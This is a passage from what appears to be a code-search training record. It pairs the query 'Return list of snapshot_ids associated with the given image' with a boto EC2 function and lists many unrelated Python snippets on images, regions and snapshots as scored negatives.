gdalParams)\n ds = gdal.Open(self._largeImagePath, gdalconst.GA_ReadOnly)\n gdal.Warp(outputPath, ds, options=gdalParams)\n except Exception as exc:\n try:\n os.unlink(outputPath)\n except Exception:\n pass\n raise exc\n return pathlib.Path(outputPath), TileOutputMimeTypes['TILED']", "def GetImageRegion(self) -> \"itkImageRegion3 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterISS3ISS3_GetImageRegion(self)", "def get_region_by_name(self, name):\n raise NotImplementedError()", "def region(self):\n return self.random_element(self._regions)", "def GetImageRegion(self) -> \"itkImageRegion3 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIUC3IUS3_GetImageRegion(self)", "def region(self):\n return [node.region for node in self]", "def get_images():\n return _IMAGES", "def GetImageRegion(self) -> \"itkImageRegion3 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIF3IUC3_GetImageRegion(self)", "def iterateRegions(self, image):\n\n h, w, _ = image.shape\n w //= 2\n h //= 2\n\n for i in range(h):\n for j in range(w):\n region = image[i * self.size:(i * self.size + self.size), j*self.size:(j*self.size + self.size)]\n yield region, i, j", "def iterateRegions(self, image):\n\n h, w, _ = image.shape\n w //= 2\n h //= 2\n\n for i in 
range(h):\n for j in range(w):\n region = image[i * self.size:(i * self.size + self.size), j*self.size:(j*self.size + self.size)]\n yield region, i, j", "def images(self, **kwargs):\n\n raise NotImplementedError", "def get_images(self):\n \n return self.img_lst", "def GetImageRegion(self) -> \"itkImageRegion3 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIUC3IUC3_GetImageRegion(self)", "def GetImageRegion(self) -> \"itkImageRegion3 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterISS3IUC3_GetImageRegion(self)", "def region(self):\n if self._region is None:\n cache_key = self.expand_name(\"region\")\n cached = unitdata.kv().get(cache_key)\n if cached:\n self._region = cached\n else:\n req = self._imdv2_request(self._az_url)\n with urlopen(req) as fd:\n az = fd.read(READ_BLOCK_SIZE).decode(\"utf8\")\n self._region = az.rstrip(string.ascii_lowercase)\n unitdata.kv().set(cache_key, self._region)\n return self._region", "def get_photo(self, i):\r\n return self.__photos[i]", "def GetImageRegion(self) -> \"itkImageRegion3 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIUC3ISS3_GetImageRegion(self)", "def get_region(self, region_id):\n raise exception.NotImplemented() # pragma: no cover", "def subimage(self, *args, **kwargs):\n return _image.image_subimage(self, *args, **kwargs)", "def get_image ( self, object ):\n return self.image", "def get_images(self, file_path: str) -> Iterable[Image]:\n return []", "def __getitem__(self, idx):\n image = Image.open(self.filenames[idx]) # PIL image\n image = self.transform(image)\n return image", "def get_images_by_vulnerability(self, **kwargs):\n ...", "def find_objects_in_image(self, image, visualize):\n self.select(image)\n\n for scan_region in self.scan_regions:\n self.set_scaling(scan_region[0])\n full, small = self.find_instances(image, scan_region[1], 0.5)\n if (visualize):\n fig = plt.figure(figsize=(30, 20))\n plt.imshow(small)\n plt.title(\"Scan region {} using scaling {}\".format(scan_region[1], scan_region[0]))\n plt.show()", "def get_image_base(self):\n base_id = self.familytree_json[0] if self.familytree_json else self\n if base_id == self.id:\n return self\n else:\n db = get_thread_scoped_session()\n return db.query(Image).get((base_id, self.user_id))", "def get_image(vm_):\n vm_image = config.get_cloud_config_value(\"image\", vm_, __opts__).encode(\n \"ascii\", \"salt-cloud-force-ascii\"\n )\n\n images = avail_images()\n for key in images:\n if vm_image and vm_image in (images[key][\"id\"], images[key][\"name\"]):\n return images[key]\n\n raise SaltCloudNotFound(\n \"The specified image, '{}', could not be found.\".format(vm_image)\n )", "def getImage(self, point):\n if self.map[point.y,point.x] != None:\n return self.map[point.y,point.x].getItemImage()", "def get_images(self):\n return [self.get_image(i) for i in range(0, self.number_sprites - 1)]", "def select_region(image):\n # Define the polygon by vertices\n rows, cols = image.shape[:2]\n bottom_left = [cols*0.05, rows*0.95]\n top_left = [cols*0.3, rows*0.55]\n bottom_right = [cols*0.95, rows*0.95]\n top_right = [cols*0.7, rows*0.55]\n # Vertices are an array of polygons (i.e array of arrays) and the data type must be integer.\n vertices = np.array([[bottom_left, top_left, top_right, bottom_right]], dtype=np.int32)\n return filter_region(image, vertices)", "def _iter_images(self):\n raise NotImplementedError", "def get_regions(self):\n return self._regions", "def 
get_images(self) -> Sequence[Optional[np.ndarray]]:\n raise NotImplementedError", "def images_mapped(self):\n try:\n return dict([x for x in enumerate(self.images())])\n except:\n return None", "def region(self, region: str) -> Region:\n return Region(self, region)", "def putregion(self, *args, **kwargs):\n return _image.image_putregion(self, *args, **kwargs)", "def get_region_of_interest(self) -> UserRoi:\n result = UserRoiStructure()\n Utils.check(VL53L1X_C_LIBRARY.VL53L1_GetUserROI(self.dev, byref(result)))\n return UserRoi.from_struct(result)", "def image_by_id(self, id):\n if not id:\n return None\n return next((image for image in self.images() if image['Id'] == id),\n None)", "def __getitem__(self, idx):\n img = self.images[idx]\n label = self.labels[idx].split(\" \")[-1]\n img = Image.open(img)\n img = img.convert('RGB')\n img = self.transform(img)\n return(img, label[:-1])", "def get_images(self):\n return self._get_brains(\"Image\")", "def region(self, region_name):\n return Region(region_name, self)", "def which_region(self, g):\n raise NotImplementedError", "def get_images(stage=0):\n return get_files(stage)[0]", "def get_image():\n return models.Image.objects.all()[0]", "def _get_im(self, idx):\n # load images\n path = self.uids[idx]\n img = self._load_im(path)\n\n # get information of each instance (e.g., tree) in a given image.\n # Each instance has its own row in the csv file,\n # so they need to be regrouped according to their path.\n groups = self.df.groupby('rgb_path')\n instances = groups.get_group(path) # contains all instances in given image\n\n num_objs = len(instances)\n boxes = [0.0] * num_objs\n labels = torch.zeros((num_objs,), dtype=torch.int64)\n #extras: cannot take string\n# uid = [''] * num_objs\n# sci_name = [''] * num_objs\n# nlcd_class = [''] * num_objs\n for i in range(num_objs):\n# import pdb; pdb.set_trace()\n boxes[i] = [instances.xmin.iloc[i], instances.ymin.iloc[i],\n instances.xmax.iloc[i], instances.ymax.iloc[i]]\n# uid[i] = self.df.uid.iloc[idx]\n# sci_name[i] = instances.scientific_name.iloc[i]\n# nlcd_class[i] = instances.nlcd_class.iloc[i]\n if self.object_rec == False:\n labels[i] = float(instances.class_id.iloc[i])\n\n if self.object_rec == True: # overwrite labels for object recognition task\n labels = torch.ones((num_objs,), dtype=torch.int64)\n\n boxes = torch.as_tensor(boxes, dtype=torch.float32)\n image_id = torch.tensor([idx])\n # for pycocotools MAP evaluation metric\n area = (boxes[:, 3] - boxes[:, 1]) * (boxes[:, 2] - boxes[:, 0])\n iscrowd = torch.zeros((num_objs,), dtype=torch.int64)\n\n target = {}\n target[\"boxes\"] = boxes\n target[\"labels\"] = labels\n target[\"image_id\"] = image_id\n target[\"area\"] = area\n target[\"iscrowd\"] = iscrowd\n #extras: cannot take string\n# target[\"site_id\"] = instances.site_id.iloc[0]\n# target[\"uid\"] = uid\n# target[\"sci_name\"] = sci_name\n# target[\"nlcd_class\"] = nlcd_class\n \n if self.transforms is not None:\n img, target = self.transforms(img, target)\n\n return img, target", "def images(self) -> dict:\n raise NotImplementedError", "def image(self, where):\n cook = cookie()\n I = Image(cook, self)\n self.call('image', cook, where)\n print(\"IMAGE\", where)\n return I" ]
[ "0.72098744", "0.719231", "0.70230323", "0.64151984", "0.63881266", "0.6098165", "0.6044503", "0.60154766", "0.6011218", "0.6006212", "0.6000203", "0.59448403", "0.5925909", "0.5922348", "0.5905722", "0.5890936", "0.5886264", "0.58704627", "0.58661884", "0.5858619", "0.5842894", "0.583351", "0.5832496", "0.5830357", "0.58169013", "0.581264", "0.58083373", "0.5805764", "0.57850456", "0.57624793", "0.5758043", "0.57552236", "0.57482123", "0.5740831", "0.57395554", "0.5724554", "0.5719464", "0.5712158", "0.570207", "0.56990904", "0.56917405", "0.5687544", "0.56794006", "0.5675569", "0.56608504", "0.56478065", "0.56440365", "0.56392294", "0.5636218", "0.56299883", "0.5626061", "0.56179243", "0.56162184", "0.5606508", "0.5589697", "0.55860364", "0.5585252", "0.5581955", "0.55746496", "0.5572329", "0.55701673", "0.55676514", "0.556762", "0.556762", "0.5560862", "0.5556951", "0.55454785", "0.5536807", "0.5531267", "0.55296427", "0.5508842", "0.55055356", "0.5500225", "0.54905134", "0.54889506", "0.5485235", "0.5482723", "0.5480729", "0.54743785", "0.54687047", "0.5460541", "0.54527503", "0.54477185", "0.54369926", "0.5426806", "0.5419665", "0.5418722", "0.541196", "0.54079366", "0.54069823", "0.5387181", "0.5385715", "0.5381326", "0.53810537", "0.5381052", "0.53786683", "0.5375281", "0.5370306", "0.5369861", "0.5365128" ]
0.6458549
3
Return list of snapshot_ids associated with the given image
def getSnapshotsOf(image):
    snapshotIds = []
    deviceMapping = image.block_device_mapping  # dict of devices
    devices = deviceMapping.keys()
    for d in devices:
        snapshotId = deviceMapping[d].snapshot_id
        if snapshotId is not None:
            snapshotIds.append(snapshotId.encode())
    return snapshotIds
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_snapshots_of(image):\n snapshot_ids = []\n device_mapping = image.block_device_mapping # dict of devices\n devices = device_mapping.keys()\n for device in devices:\n if device_mapping[device].snapshot_id is not None:\n snapshot_ids.append(device_mapping[device].snapshot_id.encode()) # do I need to have 'encode' here?\n return snapshot_ids", "def getAmisOf(snapshot, images):\n amis = []\n for im in images:\n snapshotsOfThisIm = getSnapshotsOf(im)\n for soti in snapshotsOfThisIm:\n if soti == snapshot.id:\n amis.append(im)\n return amis", "def get_image_ids(params: DownloadCommandParameters) -> List[str]:\n if params.retry:\n logger.info(f\"Attempting to download previously failed images.\")\n with open(recovery_file_name()) as fh:\n image_ids = json.load(fh)\n else:\n df = pd.read_csv(params.metadata_file)\n image_ids = df[df[\"dataset\"] == params.dataset][\"isic_id\"]\n\n return list(image_ids)", "def list_images(self):\n \n logging.debug(\"list_images entered for %s\" % self.machine_name) \n snapshots = cs.list_snapshots()\n res = []\n server_id = self.cloudserver.id\n # find the one for this server\n for snapshot in snapshots:\n img = snapshot.metadata.get(\"instance_uuid\", None)\n # print img\n\n if img == server_id:\n print \"Server %s has snapshot %s\" % (server_id, img)\n res.append(img)\n\n return res", "def cmd_account_image_ids(client, args):\n account_image_ids = client.get_account_image_ids(args.username, args.page)\n generate_output({'account_image_ids': account_image_ids})", "def getSnapshotsD(region):\n # Can a snapshot belong to more than one AMI? Dunno, keep list just in case (so it never breaks due to it)\n snapshots = getSnapshots(region)\n snapshotsDicts = []\n ims = getImages(region)\n for s in snapshots:\n amis = getAmisOf(s, ims)\n amiIds = []\n amiKeeps = []\n\n if len(amis) == 1:\n amiIds = amis[0].id.encode()\n amiKeeps = getKeepTag(amis[0])\n\n elif len(amis) == 0:\n amiIds = \"-------no-AMI-found\"\n amiKeeps = \"-------no-AMI-found\"\n else:\n for a in amis:\n amiIds.append(a.id.encode())\n amiKeeps.append(getKeepTag(a))\n\n snapshotsDict = {\"id\": s.id,\n \"status\": s.status,\n \"region\": s.region.name,\n \"progress\": s.progress,\n \"start_time\": s.start_time,\n \"volume_id\": s.volume_id,\n \"volume_size\": s.volume_size,\n \"KEEP-tag\": getKeepTag(s),\n \"Name\": get_name_tag(s),\n \"AMI(s)\": amiIds,\n \"AMI_KEEP-tags\": amiKeeps,\n \"PROD\": isProduction(s),\n \"Description\": s.description\n }\n snapshotsDicts.append(snapshotsDict)\n return snapshotsDicts", "def get_amis_of(snapshot_id):\n mes_amis = []\n # There has GOT to be a better way. Hmm... 
maybe not\n keys = Ims.spreadsheet.keys()\n for key in keys:\n if snapshot_id in Ims.spreadsheet[key]['associated_snapshots']:\n mes_amis.append(key)\n return mes_amis", "def __get_image_id(self):\n return self.__get_multi_images_ids(1)", "def getContainerSnapshots(self,node,vmid):\n data = self.connect('get','nodes/%s/lxc/%s/snapshot' % (node,vmid),None)\n return data", "def __get_picture_id_list(new):\n id_list = []\n\n if new.image1:\n id_list.append(1)\n if new.image2:\n id_list.append(2)\n if new.image3:\n id_list.append(3)\n if new.image4:\n id_list.append(4)\n\n return id_list", "def get_my_image_ids(self) -> Union[List[int], None]:\n if self.imported is not True:\n logging.error(f'File {self.file_path} has not been imported')\n return None\n else:\n q = self.conn.getQueryService()\n params = Parameters()\n path_query = self.make_substitutions()\n path_query = path_query.strip('/')\n params.map = {\"cpath\": rstring(path_query)}\n results = q.projection(\n \"SELECT i.id FROM Image i\"\n \" JOIN i.fileset fs\"\n \" JOIN fs.usedFiles u\"\n \" WHERE u.clientPath=:cpath\",\n params,\n self.conn.SERVICE_OPTS\n )\n self.image_ids = [r[0].val for r in results]\n return self.image_ids", "def find_images(diag_pre_post):\n conn = sqlite3.connect(util.DB_PATH)\n conn.text_factory = str\n cursor = conn.execute('''SELECT pid from Patient where study_id = ? ''',\n (\"LGG_reseksjonsgrad\", ))\n ids = []\n k = 0\n for row in cursor:\n k += 1\n cursor2 = conn.execute('''SELECT id from Images where pid = ? and diag_pre_post = ?''',\n (row[0], diag_pre_post))\n for _id in cursor2:\n ids.append(_id[0])\n cursor2.close()\n\n cursor.close()\n conn.close()\n return ids", "def _get_ids_from_name_private(self, name):\r\n results = self.list_private_images(name=name)\r\n return [result['id'] for result in results]", "def getSnapshots(self):\n snapshots = []\n for x in self.root.goto('CommonDataObjects/Attachments'):\n for y in x.getList():\n if y['name'] == 'Video Snapshot':\n self.f.seek(y['bidx'])\n blk = Block(self.f)\n sx = blk.goto('res_x').getLong()\n sy = blk.goto('res_y').getLong()\n raw = blk.goto(\"imagedata\").value\n data = zlib.decompress(raw)\n I = np.flipud(np.array(struct.unpack(\"<\" + str(3 * sx * sy) + \"B\", data)).reshape((sy, sx, 3)))\n snapshots.append(I)\n del blk\n return snapshots", "def jail_snapshot_list(jnid = ''):\n jname = jnid\n if 'BASE-' in jnid:\n jnid = '/BASE-RW/%s@' % jnid\n else:\n jnid = '/%s@' % jnid\n \n try:\n jsnap = subprocess.check_output(\"zfs list -t snapshot |grep \"+jnid, shell=True)\n except:\n msg = \" ERROR: No zfs snapshots found for '%s'\" % (jnid)\n log(msg)\n return False\n\n jsnap = jsnap.split('\\n')\n jsnapn = []\n for i in jsnap:\n i = i.split(' ')\n while True:\n try:\n i.remove(\"\")\n except ValueError:\n break\n jsnapn.append(i)\n\n lmen = ['Number', \"'%s' current snapshots\" % jname, 'Size']\n del jsnapn[-1]\n jsn = 0\n jsnn = []\n for i in jsnapn:\n jsnn.append([jsn, i[0], i[3]])\n jsn = jsn + 1\n\n return [jsnn, lmen]", "def get_snap_list(mnode):\n\n ret, out, _ = g.run(mnode, \"gluster snapshot list --xml\")\n if ret != 0:\n g.log.error(\"Failed to execute 'snapshot list' on node %s. 
\"\n \"Hence failed to get the snapshot list.\", mnode)\n return None\n\n try:\n root = etree.XML(out)\n except etree.ParseError:\n g.log.error(\"Failed to parse the gluster snapshot \"\n \"list xml output.\")\n return None\n\n snap_list = []\n for snap in root.findall(\"snapList/snapshot\"):\n snap_list.append(snap.text)\n\n return snap_list", "def snapshot_identification(snapshot):\n\t\treturn {\n\t\t\t'user_id': snapshot['user_id'],\n\t\t\t'timestamp': snapshot['timestamp'],\n\t\t\t'snapshot_id': snapshot['snapshot_id']}", "def image_to_list(image):\r\n\r\n return list(image.getdata())", "def get_ids(voc_path):\n ids = []\n print(\"voc\")\n\n files_images = glob.iglob(os.path.join(voc_path, \"*.JPEG\"))\n for x in files_images:\n name = os.path.splitext(os.path.basename(x))[0]\n ids.append(name)\n print(\"names: \", ids)\n return ids", "def vm_snapshotlist(args):\n snapshot = args.snapshot\n name = args.name\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n common.pprint(\"Listing snapshots of %s...\" % name)\n snapshots = k.snapshot(snapshot, name, listing=True)\n if isinstance(snapshots, dict):\n common.pprint(\"Vm %s not found\" % name, color='red')\n return\n else:\n for snapshot in snapshots:\n print(snapshot)\n return", "def image_list(self):\n return self._image_list", "def __get_multi_images_ids(self, num_images=0): \n availability_images = imageInstance()\n images = availability_images.get_images()\n images_ids = []\n for image in images:\n if image.type == 'machine':\n images_ids.append( image.id.encode(\"latin-1\") )\n if num_images>1:\n random.shuffle(images_ids)\n return images_ids[:num_images]\n return images_ids", "def get_ids_detection(self, split):\n if split == 'test': # test set has no json file. 
Scrape ids from directory.\n file_names = tf.io.gfile.listdir(\n os.path.dirname(self._image_path_100k.format(split, '')))\n image_names = [f[:-4] for f in file_names if f.endswith('.jpg')]\n return set(image_names)\n\n if split not in self._data:\n self.process_json(split)\n return self._data[split].keys()", "def _get_ids_from_name_public(self, name):\r\n results = self.list_public_images(name=name)\r\n return [result['id'] for result in results]", "def get_images_since(self, image_id=None, timestamp=None,\n offset=10, limit=0):\n\n print '%s %s %s %s' % (image_id,timestamp,limit,offset)\n\n if image_id is not None:\n\n print 'got image id'\n\n # figure out what the current id is and than grab\n # our sorted set by index assuming that all ids\n # contain an image\n next_id = int(self.rc.get('images:next_id') or 0)\n\n # how far from the end is the id given\n d = next_id - image_id\n start = next_id - d\n end = next_id - d + limit - 1\n\n print 'getting between %s %s' % (start,end)\n\n # starting back where we think this image is to + limit\n ids = self.rc.zrange('images:ids:timestamps',start,end)\n\n print 'got ids: %s' % ids\n\n elif timestamp:\n\n print 'from timestamp: %s' % timestamp\n\n # get ids from our sorted set by it's weight (aka timestamp)\n # TODO: not use inf\n ids = self.rc.zrangebyscore('images:ids:timestamps',\n timestamp,'+inf')\n\n else:\n print 'could not find images'\n ids = []\n\n # page ids\n if offset < len(ids):\n ids = ids[offset:max(len(ids),limit)]\n else:\n ids = []\n\n print 'found ids: %s' % ids\n\n # return images for each ID\n images = map(self._get_from_redis,ids)\n\n # populate image data\n map(self._populate_image_data,images)\n\n return images", "def get_legacy_image_ids(self, content_retriever):\n pass", "def get_legacy_image_ids(self, content_retriever):\n pass", "def database_volume_snapshot_get_list():\n db = database_get()\n\n session = db.session()\n query = session.query(model.VolumeSnapshot)\n\n volume_snapshot_objs = list()\n for volume_snapshot in query.all():\n nfvi_volume_snapshot_data = \\\n json.loads(volume_snapshot.nfvi_volume_snapshot_data)\n nfvi_volume_snapshot = nfvi.objects.v1.VolumeSnapshot(\n nfvi_volume_snapshot_data['uuid'],\n nfvi_volume_snapshot_data['name'],\n nfvi_volume_snapshot_data['description'],\n nfvi_volume_snapshot_data['size_gb'],\n nfvi_volume_snapshot_data['volume_uuid'])\n volume_snapshot_obj = objects.VolumeSnapshot(nfvi_volume_snapshot)\n volume_snapshot_objs.append(volume_snapshot_obj)\n return volume_snapshot_objs", "def get_image_tags(self):\n current_images = self.images()\n tags = {tag: i['Id'] for i in current_images for tag in i['RepoTags']}\n return tags", "def history(self) -> List[SnapshotLogEntry]:\n return self.metadata.snapshot_log", "def imageList(self):\n return self.__imageList", "def dangling_pic_list(pic):\n if pic and not pic.person_set.count():\n ids.append(pic.key().id())", "def _list_snapshots(self):\n return self.resource.describe_snapshots(\n Filters=[\n {\n 'Name': 'tag:CreatedBy',\n 'Values': [\n 'AutomatedBackup{}'.format(INTERVAL_TYPE.capitalize())\n ]\n }\n ]\n )", "def search_image_id(self, image_path: str) -> str:\n try:\n with open(image_path, \"rb\") as f:\n content = f.read()\n if self._check_corrupted:\n nparr = np.frombuffer(content, np.uint8)\n img_np = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n if img_np is None:\n msg = \"Decode image {} failed\".format(image_path)\n raise ValueError(msg)\n except EnvironmentError as err:\n raise EnvironmentError(\"Load image {} 
failed\".format(image_path))\n\n hash_value = self._hash(content)\n\n hash_check = self._hash_to_id.get(hash_value, [])\n for image_id, path in hash_check:\n if filecmp.cmp(image_path, path):\n registered_id = image_id\n registered_path = path\n break\n else:\n registered_id = None\n registered_path = None\n\n return registered_id, registered_path, hash_value", "def get_snapshots(self):\r\n ec2 = self.get_ec2_connection()\r\n rs = ec2.get_all_snapshots()\r\n all_vols = [self.volume_id] + self.past_volume_ids\r\n snaps = []\r\n for snapshot in rs:\r\n if snapshot.volume_id in all_vols:\r\n if snapshot.progress == '100%':\r\n snapshot.date = dateutil.parser.parse(snapshot.start_time)\r\n snapshot.keep = True\r\n snaps.append(snapshot)\r\n snaps.sort(cmp=lambda x,y: cmp(x.date, y.date))\r\n return snaps", "def get_snapshot_ids(filters: Optional[Sequence[pulumi.InputType['GetSnapshotIdsFilterArgs']]] = None,\n owners: Optional[Sequence[str]] = None,\n restorable_by_user_ids: Optional[Sequence[str]] = None,\n opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetSnapshotIdsResult:\n __args__ = dict()\n __args__['filters'] = filters\n __args__['owners'] = owners\n __args__['restorableByUserIds'] = restorable_by_user_ids\n opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)\n __ret__ = pulumi.runtime.invoke('aws:ebs/getSnapshotIds:getSnapshotIds', __args__, opts=opts, typ=GetSnapshotIdsResult).value\n\n return AwaitableGetSnapshotIdsResult(\n filters=pulumi.get(__ret__, 'filters'),\n id=pulumi.get(__ret__, 'id'),\n ids=pulumi.get(__ret__, 'ids'),\n owners=pulumi.get(__ret__, 'owners'),\n restorable_by_user_ids=pulumi.get(__ret__, 'restorable_by_user_ids'))", "def get_image_id(image):\n if not is_valid_image(image):\n return False\n\n return AVAILABLE_IMAGES[image]['imageid']", "def getTagsFromImages(metadataService, imageIds):\n \n types = [\"ome.model.annotations.TagAnnotation\"]\n annotations = metadataService.loadAnnotations(\"Image\", imageIds, types, None, None)\n \n tagsMap = {}\n for i in imageIds:\n annots = annotations[i]\n tags = [a.getTextValue().getValue() for a in annots]\n tagsMap[i] = tags\n return tagsMap", "def handle_api_list_images(self, http_context):\n\n command = self.docker + ['images', '--format', '\\'{{json .}}\\'', '--no-trunc', '-a']\n images = []\n for line in subprocess.check_output(command).decode().splitlines():\n image = json.loads(line)\n image['hash'] = image['ID'].split(':')[1][:12]\n images.append(image)\n return images", "def getIDs():", "def get_images(self):\r\n if self.images is None:\r\n self.images = {}\r\n for name, img_num in self.images.iteritems():\r\n if isinstance(img_num, int):\r\n yield (name, img_num)", "def get_ids(self) -> List[str]:", "def get_scan_ids(self):\n return list(self.scans.keys())", "def derived_snapshots(self):\n start_time = time.time()\n log.debug(\"Getting snaps derived from volume {0}.\".format(self.volume_id))\n derived_snapshots = []\n for snap in self.app.cloud_interface.get_all_snapshots():\n try:\n if snap.volume_id == self.volume_id:\n derived_snapshots.append(snap)\n except EC2ResponseError, e:\n log.warning(\"EC2ResponseError getting snapshot status: {0} \"\n \"(code {1}; status {2})\"\n .format(e.message, e.error_code, e.status))\n log.debug(\"Got snaps derived from volume {0} in {1} seconds: {2}\"\n .format(self.volume_id, time.time() - start_time, derived_snapshots))\n return derived_snapshots", "def cmd_image_id(client, args):\n image = client.get_image(args.image_id)\n data = 
image.__dict__\n generate_output({'image': data})", "def list_images(bin_lid):\n bin_url = DATA_NAMESPACE + bin_lid + '.json'\n logging.info('listing images for %s' % bin_lid)\n ds = json.loads(urllib.urlopen(bin_url).read())\n for d in ds:\n yield d['imagename']", "def get_image_list(self, account):\n images = self.driver(account).list_images()\n return [image.name for image in images]", "def snapshots_created(self):\n # log.debug(\"Getting snaps created for volume {0}\".format(self.volume_id))\n snaps_info = []\n for snap in self._derived_snapshots:\n snap_info = {}\n try:\n if snap.volume_id == self.volume_id:\n snap.update()\n snap_info['snap_id'] = snap.id\n snap_info['snap_progress'] = snap.progress\n snap_info['snap_status'] = snap.status\n snap_info['snap_desc'] = snap.description\n snaps_info.append(snap_info)\n except EC2ResponseError, e:\n log.warning(\"EC2ResponseError getting snapshot status: {0} \"\n \"(code {1}; status {2})\"\n .format(e.message, e.error_code, e.status))\n return snaps_info", "def get_snapshot_children(self, snapshot):\n LOG.debug('get_snapshot_children starts.')\n pool_name = self.configuration.rbd_pool\n volume_name = \\\n 'volume-%s' % encodeutils.safe_encode(snapshot[\"volume_id\"])\n snap_name = 'snapshot-%s' % encodeutils.safe_encode(snapshot['id'])\n children = list()\n children_on_snap = \\\n self._get_snapshot_children(pool_name, volume_name, snap_name)\n if children_on_snap is not None:\n for child in children_on_snap:\n item = dict()\n if len(child) == 2:\n item[\"pool_name\"] = child[0]\n item[\"volume_name\"] = child[1]\n if child[1].startswith(\"volume-\"):\n item[\"type\"] = \"volume\"\n item[\"uuid\"] = child[1][len(\"volume-\"):]\n elif uuidutils.is_uuid_like(child[1]):\n item[\"type\"] = \"volume\"\n item[\"uuid\"] = child[1]\n else:\n item[\"type\"] = \"\"\n item[\"uuid\"] = \"\"\n children.append(item)\n\n LOG.debug('snapshot children: %s', children)\n LOG.debug('get_snapshot_children finished.')\n return children", "def snapshots(self, owner=None, restorable_by=None):\r\n rs = self.connection.get_all_snapshots(owner=owner,\r\n restorable_by=restorable_by)\r\n mine = []\r\n for snap in rs:\r\n if snap.volume_id == self.id:\r\n mine.append(snap)\r\n return mine", "def history(self) -> List[Dict[str, Any]]:\n\n response = self.client.get(f\"/images/{self.id}/history\")\n body = response.json()\n\n if response.status_code == 200:\n return body\n\n if response.status_code == 404:\n raise ImageNotFound(body[\"cause\"], response=response, explanation=body[\"message\"])\n raise APIError(body[\"cause\"], response=response, explanation=body[\"message\"])", "def items(self):\n if self.__has_contents:\n return [dict(zip(['id', 'description', 'size', 'start_time', 'state'],\n [item['SnapshotId'], item['Description'], item['VolumeSize'],\n item['StartTime'], item['State']]))\n for item in self.__response['Snapshots']]\n else:\n return []", "def _read_image_ids(image_ids_path):\n return list(map(str.strip, open(image_ids_path, \"r\").readlines()))", "def _from_snapshot_request(pre_image, image):\n if pre_image.status == 'queued' and len(image.locations) == 1:\n loc_meta = image.locations[0]['metadata']\n return loc_meta and loc_meta.get('image_from', None) in ['snapshot',\n 'volume']", "def get_snapshots(self) -> SnapshotListing:\n return self.snapshots", "def get_images_list(self):\n return self.image_filenames_list", "def get_image_ids(task):\n run_ids = [\n i for i, code in enumerate(BOLD_NAMES, 1) if task.upper() in code\n ]\n if not run_ids:\n 
raise ValueError(f\"Found no data for '{task}''\")\n return run_ids", "def get_snapshot_ids_output(filters: Optional[pulumi.Input[Optional[Sequence[pulumi.InputType['GetSnapshotIdsFilterArgs']]]]] = None,\n owners: Optional[pulumi.Input[Optional[Sequence[str]]]] = None,\n restorable_by_user_ids: Optional[pulumi.Input[Optional[Sequence[str]]]] = None,\n opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetSnapshotIdsResult]:\n ...", "def get_image_information(client):\n\n pipeline = [{\"$match\": {\"camera_views\": {\"$exists\": 1}}}, {\"$unwind\": {\"path\": \"$camera_views\"}}, {\"$addFields\": {\n \"camera_views.average_linear_distance\": {\n \"$divide\": [\n \"$camera_views.total_linear_distance\",\n \"$camera_views.num_entities\"\n ]\n },\n \"camera_views.average_angular_distance\": {\n \"$divide\": [\n \"$camera_views.total_angular_distance\",\n \"$camera_views.num_entities\"\n ]\n },\n \"camera_views.timestamp\": \"$timestamp\",\n \"camera_views._id\": \"$_id\",\n \"camera_views.database\": client.database.name,\n \"camera_views.collection\": client.name,\n 'camera_views.file_id':\"$camera_views.images.file_id\", #Add the Color image id for downloading and testing\n }}, {\"$replaceRoot\": {\"newRoot\": \"$camera_views\"}}, {\"$project\": {\n \"_id\": 1,\n \"num_entities\": 1,\n \"average_linear_distance\": 1,\n \"average_angular_distance\": 1,\n \"timestamp\": 1,\n \"duplicate\": 1,\n \"database\":1,\n \"collection\":1,\n \"file_id\":{\"$arrayElemAt\":[\"$images.file_id\",0]}, # Only keep the first file id (The Color image)\n }}]\n pprint.pprint(pipeline)\n result = list(client.aggregate(pipeline))\n return result", "def list_snapshots(project):\n data = {constants.PROJECT_PARAMETER: project}\n res = requests.post(_url + \"list_snapshots/\", data=data,\n auth=(_username, _password))\n if res.status_code == 200:\n snapshots = json.loads(res.content)\n table = PrettyTable(field_names=[\"Snapshot\", \"Parent\"])\n for snapshot in snapshots:\n table.add_row(snapshot)\n click.echo(table.get_string())\n else:\n click.echo(res.content)", "def annotation_history(request, image_id):\n\n image = get_object_or_404(Image, id=image_id)\n source = image.source\n\n # Use values_list() and list() to avoid nested queries.\n # https://docs.djangoproject.com/en/1.3/ref/models/querysets/#in\n annotation_values = Annotation.objects.filter(image=image, source=source).values('pk', 'point__point_number')\n annotation_ids = [v['pk'] for v in annotation_values]\n\n # Prefetch versions from the DB.\n versions_queryset = Version.objects.filter(object_id__in=list(annotation_ids))\n versions = list(versions_queryset) # list() prefetches.\n\n # label_pks_to_codes maps Label pks to the corresponding Label's short code.\n label_pks = set([v.field_dict['label'] for v in versions])\n labels = Label.objects.filter(pk__in=label_pks).values_list('pk', 'code')\n label_pks_to_codes = dict(labels)\n for pk in label_pks:\n if pk not in label_pks_to_codes:\n label_pks_to_codes[pk] = \"(Deleted label)\"\n\n revision_pks = versions_queryset.values_list('revision', flat=True).distinct()\n revisions = list(Revision.objects.filter(pk__in=list(revision_pks)))\n\n # anno_pks_to_pointnums maps each Annotation's pk to the corresponding\n # Point's point number.\n point_number_tuples = [(v['pk'], v['point__point_number']) for v in annotation_values]\n anno_pks_to_pointnums = dict()\n for tup in point_number_tuples:\n anno_pks_to_pointnums[tup[0]] = tup[1]\n\n event_log = []\n\n for rev in revisions:\n # Get Versions under 
